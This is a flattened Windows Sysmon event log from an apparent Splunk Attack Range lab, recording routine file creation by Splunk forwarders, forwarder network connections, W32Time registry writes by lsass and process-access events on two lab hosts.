07:52:22.181{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8981EEC3B8E3E7A6CD1FDE020DE0D69,SHA256=C688E809C1288240A9FE4072F0277DE6FD9F78B19251098DD1ED0E189E4B0411,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081674Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:22.195{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C75DFD573B37E8B42861F373C19233D,SHA256=5D7A35F7249FB9EAE9982E5F18BB498149C87E7660EC66431DC7B422CE4EFFF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103844Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:23.792{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-024MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103843Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:23.212{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AFA8279F9DB81D386AB27811C7BF351,SHA256=1CA5DC02A7E518831937625CF6706D3389ACB1817F03718ECD2AC645F0D7F190,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081675Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:23.195{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF0DFFBF4C46E83B8D94FACC6DF84680,SHA256=B67D4D47D87E223AD1EBFC8B73A9849DC9F36DA7F479F8C5C12604F7B8394594,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103846Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:24.807{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-025MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103845Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:24.259{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCAF1B34ABEC47D268C85D81EC59875B,SHA256=A3AB104086363E63DAE76E859262EE5ED9CAFD51410E79B8199482397C795D4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081676Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:24.335{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71BB889BBD51238C9FC5AAF3064F5F86,SHA256=68211C65EAFD1F6CE070A44A19BDF053906E2FD1C1133E0FC378D52C903FCC21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081677Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:25.398{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EEF59F5097B39126DB817252510EDDD,SHA256=3BAD46423CAF1776251407BA7F5F27D343682E0022AD9976499B2C3F3147BCA1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103858Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:24.464{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49554-false10.0.1.12-8000- 13241300x8000000000000000103857Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:52:25.605{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000103856Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:52:25.605{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0018878a) 13241300x8000000000000000103855Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:52:25.605{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8ec-0x63a63155) 13241300x8000000000000000103854Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:52:25.605{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f4-0xc56a9955) 13241300x8000000000000000103853Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:52:25.605{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fd-0x272f0155) 13241300x8000000000000000103852Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:52:25.605{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000103851Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:52:25.605{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0018878a) 13241300x8000000000000000103850Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:52:25.605{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8ec-0x63a63155) 13241300x8000000000000000103849Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:52:25.605{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f4-0xc56a9955) 13241300x8000000000000000103848Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:52:25.605{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fd-0x272f0155) 23542300x8000000000000000103847Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:25.272{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33D81FC033A30FA4BCE6461C9757DF54,SHA256=F671858BB9E60ADA4F72E1F202E0927DB7A2ED57ED79403F00F0D6E4F48C0716,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081678Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:26.398{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2051EE672524DA8348A5108CF0B92535,SHA256=18AC512524CDBA865C5A7CD9D202744DA9E03C44C05AF9F82CA1C1F83DBA6171,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103859Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:26.277{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0B698907040D256CAE7FEC4466D31FF,SHA256=6C629C27002ABD6719BFA360681B8B62367239F6437E6BC0E841D9A0F010DC6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081680Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:27.398{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CADEA8C4D2B0938E2C4BFD619486EE9,SHA256=DC4E04E987EF689C252948344453ACC278852EF97CABF56382E08B0DD13B37C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081679Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:24.638{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50048-false10.0.1.12-8000- 23542300x8000000000000000103860Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:27.277{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35C07CC525C62AB29038F84CE776A952,SHA256=F0B78FBFB741F6EE91B80B573B442D9B94BE0B818D66E4BDF970506250F03560,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081681Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:28.538{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72A588F3E47EA7FBD691D86551967CC7,SHA256=6F13575C3C3A5A4BEDD7CC345AF68A0E0AD6061B3511A24FD66B3B8FAB96EE2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103861Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:28.308{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEBA50A92F90FF29A7809028CCCA02B4,SHA256=2F7F4715B2E89F65DDA258B7DE34B1399F0CCDD11734CCCEB382BF74C74DD910,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081683Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:29.757{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B4C5BFB1E2C257B56F124A15362BB4C,SHA256=DC4B2B7F38966AF57FDA349ECF1D1616667B56B35BFDEDC65B95A7B7461FE0CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103862Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:29.324{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F08FA23D8DBA552F15F919C3FEB805CB,SHA256=EEF74E21C551CF816B3911A4B34BB6671622785B08F7C97F6ACB077D1A8F6AA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081682Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:29.679{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081684Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:30.820{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=227C8E07B7A554557A3CB4D72DB6F392,SHA256=0973192F8BDDB636C1C763DA552496584FA5873C1C25C081B32AA3C9F5B212B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103863Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:30.324{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9DA10BEF3CFFE330EB190184BCEB170,SHA256=F308A7D59DC62BA79D1C548110849C510109DFDFDC9BF385A138A1F0EE37EC7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081713Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.960{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=055038091603066E8C70C961A60A9C96,SHA256=03AB3E7763B269370E80A889323B7DC22243DA550325987330867465996A73C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103865Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:30.450{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49555-false10.0.1.12-8000- 23542300x8000000000000000103864Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:31.339{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=025789FCB4DE27A3BA7DCBC11F1E8688,SHA256=D06CF32D1429C823B4ABFD1F0668805CD2E2214923D60BEBB0397C9B395768DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081712Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.835{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B2BF-615A-5101-00000000FD01}1224C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081711Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.835{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081710Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.835{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081709Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.835{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081708Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.835{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081707Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.835{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081706Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.835{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081705Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.835{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081704Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.835{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081703Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 